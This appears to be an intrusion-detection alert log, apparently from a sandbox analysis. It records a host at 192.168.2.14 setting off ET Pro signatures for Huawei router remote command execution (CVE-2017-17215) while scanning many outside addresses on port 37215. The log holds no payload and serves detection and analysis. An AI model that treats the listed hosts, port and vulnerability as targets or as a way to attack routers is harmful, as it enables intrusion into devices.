                                                        06/13/24-21:32:13.543362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387637215192.168.2.1441.219.139.166
                                                        06/13/24-21:32:17.676337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508037215192.168.2.14156.208.29.243
                                                        06/13/24-21:32:17.694439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583837215192.168.2.14156.170.221.197
                                                        06/13/24-21:32:32.164767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324837215192.168.2.14197.148.208.232
                                                        06/13/24-21:32:48.552522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250037215192.168.2.14197.236.90.51
                                                        06/13/24-21:32:03.294685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833237215192.168.2.1441.211.167.205
                                                        06/13/24-21:32:32.167053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.14156.97.5.214
                                                        06/13/24-21:33:15.258888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709437215192.168.2.14156.63.186.132
                                                        06/13/24-21:32:46.502670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726237215192.168.2.14197.209.133.16
                                                        06/13/24-21:31:59.177214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450437215192.168.2.14156.252.191.201
                                                        06/13/24-21:32:23.833349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837637215192.168.2.1441.21.203.61
                                                        06/13/24-21:32:07.401153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375637215192.168.2.14197.33.10.97
                                                        06/13/24-21:32:21.801115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308637215192.168.2.1441.108.118.123
                                                        06/13/24-21:32:15.606172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585037215192.168.2.1441.104.70.125
                                                        06/13/24-21:32:15.610561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.14197.138.66.129
                                                        06/13/24-21:32:46.502934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756637215192.168.2.14156.97.164.14
                                                        06/13/24-21:32:44.477478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001437215192.168.2.14197.47.65.14
                                                        06/13/24-21:32:28.045317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848437215192.168.2.14156.102.252.150
                                                        06/13/24-21:32:38.296345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285637215192.168.2.1441.204.26.120
                                                        06/13/24-21:32:23.834308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532637215192.168.2.14197.113.197.55
                                                        06/13/24-21:32:42.420213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885637215192.168.2.14156.15.163.89
                                                        06/13/24-21:32:07.401959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916237215192.168.2.14156.161.180.80
                                                        06/13/24-21:33:02.913519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482837215192.168.2.14156.30.49.22
                                                        06/13/24-21:33:17.307849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662637215192.168.2.1441.121.123.149
                                                        06/13/24-21:31:59.196534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479437215192.168.2.1441.236.174.219
                                                        06/13/24-21:32:38.323735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277237215192.168.2.1441.185.175.102
                                                        06/13/24-21:33:07.056271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547437215192.168.2.14156.51.6.73
                                                        06/13/24-21:32:19.727789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643237215192.168.2.14156.179.191.155
                                                        06/13/24-21:32:03.309770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553837215192.168.2.1441.55.223.98
                                                        06/13/24-21:32:01.222148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331837215192.168.2.1441.161.127.92
                                                        06/13/24-21:32:09.457905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.1441.11.77.206
                                                        06/13/24-21:32:23.835979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405037215192.168.2.14156.45.250.5
                                                        06/13/24-21:32:36.266025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120237215192.168.2.1441.54.86.247
                                                        06/13/24-21:32:56.784644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517837215192.168.2.14156.65.176.20
                                                        06/13/24-21:32:19.753391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770837215192.168.2.14156.195.7.164
                                                        06/13/24-21:32:05.370670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377037215192.168.2.14156.253.43.249
                                                        06/13/24-21:33:15.274733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416237215192.168.2.14197.156.227.129
                                                        06/13/24-21:32:11.488807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517237215192.168.2.14197.141.77.193
                                                        06/13/24-21:32:19.731542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484837215192.168.2.1441.137.229.255
                                                        06/13/24-21:32:17.672354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069637215192.168.2.14197.220.60.31
                                                        06/13/24-21:32:07.403630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225637215192.168.2.1441.230.61.20
                                                        06/13/24-21:32:07.417413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463237215192.168.2.14197.16.214.48
                                                        06/13/24-21:31:57.137533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211637215192.168.2.1441.107.23.150
                                                        06/13/24-21:32:32.170852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766837215192.168.2.14197.49.5.126
                                                        06/13/24-21:32:32.168575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137637215192.168.2.14197.90.59.131
                                                        06/13/24-21:33:15.255343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149637215192.168.2.14197.186.171.121
                                                        06/13/24-21:32:32.167636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038437215192.168.2.14197.137.100.80
                                                        06/13/24-21:33:02.911068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026037215192.168.2.1441.29.10.253
                                                        06/13/24-21:32:38.318325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.1441.153.75.122
                                                        06/13/24-21:32:03.279587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450437215192.168.2.14197.110.122.85
                                                        06/13/24-21:32:25.975071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359237215192.168.2.14197.189.139.226
                                                        06/13/24-21:32:52.659622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622037215192.168.2.14197.42.99.2
                                                        06/13/24-21:32:36.267397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.14156.147.158.180
                                                        06/13/24-21:33:09.127832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.14156.83.220.69
                                                        06/13/24-21:32:34.197607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492837215192.168.2.1441.23.114.21
                                                        06/13/24-21:32:38.304130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101837215192.168.2.14197.224.207.206
                                                        06/13/24-21:32:23.942771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675637215192.168.2.14156.42.249.202
                                                        06/13/24-21:33:15.269172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772037215192.168.2.14197.75.97.143
                                                        06/13/24-21:32:15.610371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279437215192.168.2.14197.30.188.198
                                                        06/13/24-21:33:09.106206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322237215192.168.2.14156.52.218.14
                                                        06/13/24-21:32:25.990460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026437215192.168.2.14197.170.206.50
                                                        06/13/24-21:32:11.509482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.14156.189.72.131
                                                        06/13/24-21:33:00.888499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865637215192.168.2.1441.140.96.82
                                                        06/13/24-21:31:57.090462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347437215192.168.2.14156.110.128.12
                                                        06/13/24-21:33:09.107689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702037215192.168.2.1441.217.249.151
                                                        06/13/24-21:32:38.303553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412037215192.168.2.14197.149.233.109
                                                        06/13/24-21:33:04.988385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865637215192.168.2.14156.223.247.227
                                                        06/13/24-21:32:38.305543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357437215192.168.2.1441.117.145.159
                                                        06/13/24-21:33:07.054996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859437215192.168.2.14197.213.100.77
                                                        06/13/24-21:32:05.369403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133037215192.168.2.1441.31.234.136
                                                        06/13/24-21:32:56.785058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500437215192.168.2.14156.133.66.157
                                                        06/13/24-21:33:00.869017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055237215192.168.2.1441.245.13.167
                                                        06/13/24-21:32:48.553427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727037215192.168.2.14197.185.207.87
                                                        06/13/24-21:32:03.301353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580437215192.168.2.1441.9.2.99
                                                        06/13/24-21:32:42.403036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725037215192.168.2.14156.233.245.53
                                                        06/13/24-21:32:03.279817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065437215192.168.2.14156.67.134.124
                                                        06/13/24-21:32:34.214388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413837215192.168.2.1441.168.235.140
                                                        06/13/24-21:31:57.093133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761037215192.168.2.14156.13.82.96
                                                        06/13/24-21:32:48.572647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426837215192.168.2.14156.82.112.99
                                                        06/13/24-21:32:13.544536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252637215192.168.2.1441.206.90.17
                                                        06/13/24-21:32:13.546181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432837215192.168.2.14197.88.86.227
                                                        06/13/24-21:32:23.942082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383837215192.168.2.14156.234.139.157
                                                        06/13/24-21:32:23.937651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064837215192.168.2.14156.58.136.164
                                                        06/13/24-21:32:56.790122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493437215192.168.2.14197.98.80.170
                                                        06/13/24-21:32:15.611355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.14197.220.12.45
                                                        06/13/24-21:32:34.193679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180237215192.168.2.14156.80.104.179
                                                        06/13/24-21:33:11.176156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092037215192.168.2.1441.59.250.83
                                                        06/13/24-21:32:28.027122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970837215192.168.2.1441.79.17.190
                                                        06/13/24-21:33:13.230114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775437215192.168.2.14156.154.52.164
                                                        06/13/24-21:32:23.837182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769837215192.168.2.14197.242.91.91
                                                        06/13/24-21:32:25.977123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258837215192.168.2.1441.70.50.232
                                                        06/13/24-21:32:28.044524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460037215192.168.2.14197.187.198.219
                                                        06/13/24-21:33:13.211991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984637215192.168.2.1441.54.151.210
                                                        06/13/24-21:32:03.273417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493637215192.168.2.14197.48.254.185
                                                        06/13/24-21:32:17.697390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659237215192.168.2.1441.123.180.60
                                                        06/13/24-21:32:05.350786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275237215192.168.2.14156.235.49.28
                                                        06/13/24-21:32:13.545157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688837215192.168.2.14156.227.154.3
                                                        06/13/24-21:33:00.870283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933437215192.168.2.14156.74.197.247
                                                        06/13/24-21:32:05.348436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.1441.4.70.61
                                                        06/13/24-21:32:19.749975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401637215192.168.2.14156.220.5.233
                                                        06/13/24-21:33:09.085316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823037215192.168.2.14156.162.213.0
                                                        06/13/24-21:33:11.159433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718437215192.168.2.14197.250.246.82
                                                        06/13/24-21:32:36.264947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810637215192.168.2.1441.144.95.229
                                                        06/13/24-21:32:40.356806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407437215192.168.2.14197.48.202.63
                                                        06/13/24-21:32:52.678168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775437215192.168.2.14197.142.183.119
                                                        06/13/24-21:33:15.270851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191237215192.168.2.1441.102.190.255
                                                        06/13/24-21:32:48.570774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808037215192.168.2.14197.241.216.210
                                                        06/13/24-21:32:21.800248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717837215192.168.2.14156.223.27.223
                                                        06/13/24-21:32:17.695819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892237215192.168.2.14197.229.1.88
                                                        06/13/24-21:32:15.611550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011037215192.168.2.14197.79.67.105
                                                        06/13/24-21:32:17.672283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.1441.112.139.203
                                                        06/13/24-21:33:11.160449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14197.212.164.101
                                                        06/13/24-21:32:44.452909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14197.228.243.252
                                                        06/13/24-21:32:07.402238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518837215192.168.2.1441.26.58.124
                                                        06/13/24-21:32:13.543283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659437215192.168.2.14156.11.9.0
                                                        06/13/24-21:33:09.090325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366237215192.168.2.14156.1.186.248
                                                        06/13/24-21:32:42.404723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877237215192.168.2.1441.20.58.249
                                                        06/13/24-21:32:15.605415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693437215192.168.2.14156.24.172.61
                                                        06/13/24-21:32:03.307444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942837215192.168.2.14156.19.253.155
                                                        06/13/24-21:33:04.993286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024037215192.168.2.1441.255.187.159
                                                        06/13/24-21:33:13.212747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404237215192.168.2.14156.223.158.225
                                                        06/13/24-21:32:50.629490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897637215192.168.2.1441.10.35.85
                                                        06/13/24-21:32:36.264205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508237215192.168.2.14156.101.18.25
                                                        06/13/24-21:32:17.671521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127837215192.168.2.1441.182.15.14
                                                        06/13/24-21:32:23.945917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793037215192.168.2.14197.23.110.121
                                                        06/13/24-21:32:01.224325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221237215192.168.2.1441.197.219.42
                                                        06/13/24-21:33:00.869493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721637215192.168.2.14156.1.166.221
                                                        06/13/24-21:32:25.997333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439637215192.168.2.1441.6.57.1
                                                        06/13/24-21:32:56.755483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516237215192.168.2.14156.78.53.10
                                                        06/13/24-21:32:44.476446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598437215192.168.2.1441.54.0.39
                                                        06/13/24-21:32:56.759339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749437215192.168.2.1441.40.111.197
                                                        06/13/24-21:33:11.174147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727237215192.168.2.1441.51.40.128
                                                        06/13/24-21:32:05.369839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948037215192.168.2.14197.164.31.104
                                                        06/13/24-21:32:30.078772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041237215192.168.2.14156.156.236.135
                                                        06/13/24-21:32:13.543856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778037215192.168.2.14156.35.83.31
                                                        06/13/24-21:32:48.568842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887237215192.168.2.14197.216.157.198
                                                        06/13/24-21:32:52.670488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959637215192.168.2.1441.244.251.75
                                                        06/13/24-21:33:07.041276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077437215192.168.2.14156.235.219.79
                                                        06/13/24-21:32:11.506108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878037215192.168.2.14197.130.234.83
                                                        06/13/24-21:32:32.152875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624837215192.168.2.14197.221.109.60
                                                        06/13/24-21:32:52.677000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188437215192.168.2.14156.125.36.112
                                                        06/13/24-21:33:07.040241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.14197.249.206.165
                                                        06/13/24-21:32:07.402128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572237215192.168.2.14197.255.55.241
                                                        06/13/24-21:32:30.074189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969037215192.168.2.14156.196.99.165
                                                        06/13/24-21:32:44.455031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570437215192.168.2.14197.26.30.175
                                                        06/13/24-21:32:54.710044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459837215192.168.2.14197.138.108.223
                                                        06/13/24-21:32:38.297298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398037215192.168.2.1441.114.146.203
                                                        06/13/24-21:32:42.408053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627237215192.168.2.14156.84.114.144
                                                        06/13/24-21:32:23.945494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033037215192.168.2.1441.13.90.62
                                                        06/13/24-21:32:01.241351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815837215192.168.2.14156.223.59.169
                                                        06/13/24-21:32:01.224364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359437215192.168.2.14156.129.125.8
                                                        06/13/24-21:33:11.174708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858437215192.168.2.1441.195.140.14
                                                        06/13/24-21:32:03.304056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913437215192.168.2.14197.208.7.5
                                                        06/13/24-21:33:15.252373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024637215192.168.2.14197.243.196.12
                                                        06/13/24-21:32:36.264390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775037215192.168.2.14156.177.111.157
                                                        06/13/24-21:32:44.478724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133837215192.168.2.14156.78.195.164
                                                        06/13/24-21:32:54.727208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653037215192.168.2.14156.168.37.28
                                                        06/13/24-21:31:57.154198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047237215192.168.2.14197.117.47.205
                                                        06/13/24-21:33:00.888117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795837215192.168.2.1441.165.101.115
                                                        06/13/24-21:33:04.992777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385837215192.168.2.1441.203.21.226
                                                        06/13/24-21:32:05.370923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.14197.63.150.180
                                                        06/13/24-21:33:00.866764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716037215192.168.2.1441.92.181.84
                                                        06/13/24-21:32:28.048560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746237215192.168.2.1441.202.103.234
                                                        06/13/24-21:32:30.079791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694637215192.168.2.14156.227.175.19
                                                        06/13/24-21:33:13.229800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028837215192.168.2.1441.10.59.61
                                                        06/13/24-21:32:58.841032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.14197.87.156.203
                                                        06/13/24-21:33:13.213577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478637215192.168.2.14156.31.70.92
                                                        06/13/24-21:33:17.307263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548237215192.168.2.14197.68.215.74
                                                        06/13/24-21:32:54.708574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592437215192.168.2.14197.210.88.217
                                                        06/13/24-21:32:19.754398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942637215192.168.2.1441.242.216.239
                                                        06/13/24-21:32:23.835731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089037215192.168.2.1441.63.252.23
                                                        06/13/24-21:32:50.610432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137237215192.168.2.1441.203.226.11
                                                        06/13/24-21:33:00.867955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130837215192.168.2.14197.217.34.168
                                                        06/13/24-21:32:42.420416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971037215192.168.2.14197.123.241.60
                                                        06/13/24-21:33:17.306691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757237215192.168.2.1441.197.88.97
                                                        06/13/24-21:33:02.952581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.14197.186.147.91
                                                        06/13/24-21:33:11.181505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169037215192.168.2.14156.31.30.200
                                                        06/13/24-21:32:38.321663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757637215192.168.2.14156.132.247.129
                                                        06/13/24-21:32:54.726240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480037215192.168.2.14197.4.45.33
                                                        06/13/24-21:32:01.241440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186837215192.168.2.14156.221.118.239
                                                        06/13/24-21:32:19.731776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920237215192.168.2.1441.44.70.8
                                                        06/13/24-21:32:05.377851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006437215192.168.2.1441.215.109.182
                                                        06/13/24-21:32:44.456900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240237215192.168.2.14197.108.78.212
                                                        06/13/24-21:32:23.941998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076637215192.168.2.14197.81.248.15
                                                        06/13/24-21:32:30.099712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543637215192.168.2.14197.16.132.110
                                                        06/13/24-21:32:58.840063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449237215192.168.2.14197.96.158.121
